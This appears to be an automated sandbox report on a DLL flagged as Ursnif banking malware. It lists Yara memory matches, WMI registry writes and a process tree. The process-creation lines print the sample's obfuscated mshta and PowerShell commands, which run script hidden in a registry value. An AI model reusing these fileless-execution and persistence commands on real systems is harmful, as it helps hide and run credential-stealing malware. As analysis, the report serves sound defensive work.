            Source: Yara matchFile source: 00000003.00000003.340116197.000000000517B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.316726446.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.363641305.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.316760481.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.487230410.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.364605530.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.364538773.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.339988265.000000000567B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.362673696.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.364182389.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.364803620.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.339523552.000000000582B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.340805268.000000000382B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.487250466.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.365593483.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.362522995.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6360, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 6388, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6400, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6424, type: MEMORYSTR

            E-Banking Fraud:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000004.00000003.364280068.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.316367709.00000000059A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.482173365.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.364396735.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.317676885.00000000039A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.363061307.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.482158894.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.363790330.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.340116197.000000000517B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.316726446.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.363641305.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.316760481.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.487230410.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.364605530.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.364538773.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.339988265.000000000567B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.362673696.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.364182389.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.364803620.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.339523552.000000000582B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.340805268.000000000382B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.487250466.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.365593483.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.362522995.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6360, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 6388, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6400, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6424, type: MEMORYSTR

            System Summary:

            barindex
            PE file has a writeable .text sectionShow sources
            Source: 6.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Writes or reads registry keys via WMIShow sources
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Writes registry values via WMIShow sources
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: 6.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00F1B084
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00F13373
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00F1294D
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00F16C06 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00F165B4 NtMapViewOfSection,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00F17562 GetProcAddress,NtCreateSection,memset,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00F1B2A9 NtQueryVirtualMemory,
            Source: 6.dllBinary or memory string: OriginalFilenameSymErr.exeT vs 6.dll
            Source: 6.dllBinary or memory string: OriginalFilenameNsc.exe. vs 6.dll
            Source: 6.dllBinary or memory string: OriginalFilenamebyInstallHelper.exe. vs 6.dll
            Source: 6.dllBinary or memory string: OriginalFilenameBgRegister.exe4 vs 6.dll
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: 6.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
            Source: 6.dllStatic PE information: invalid certificate
            Source: 6.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\6.dll"
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\6.dll",#1
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\6.dll
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\6.dll",#1
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6.dll,DllRegisterServer
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\BackgroundTransferHost.exe "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
            Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>F7u2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F7u2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
            Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ygup='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ygup).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
            Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Me2g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Me2g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Cf1r='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cf1r).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES451.tmp" "c:\Users\user\AppData\Local\Temp\nigogz4l\CSCB0FB5A4205944E4B1A4F1A7502114E8.TMP"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.cmdline
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.cmdline
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES11BF.tmp" "c:\Users\user\AppData\Local\Temp\nlbomp32\CSCD36E4F5AB95F41AC9563905B5139F56.TMP"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES148E.tmp" "c:\Users\user\AppData\Local\Temp\wklr4juq\CSC206B99537D694137B0FEEBD968CAD59B.TMP"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.cmdline
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1B16.tmp" "c:\Users\user\AppData\Local\Temp\uu5u2nmv\CSC63445C49B154491498BDD3FB79A78AC.TMP"
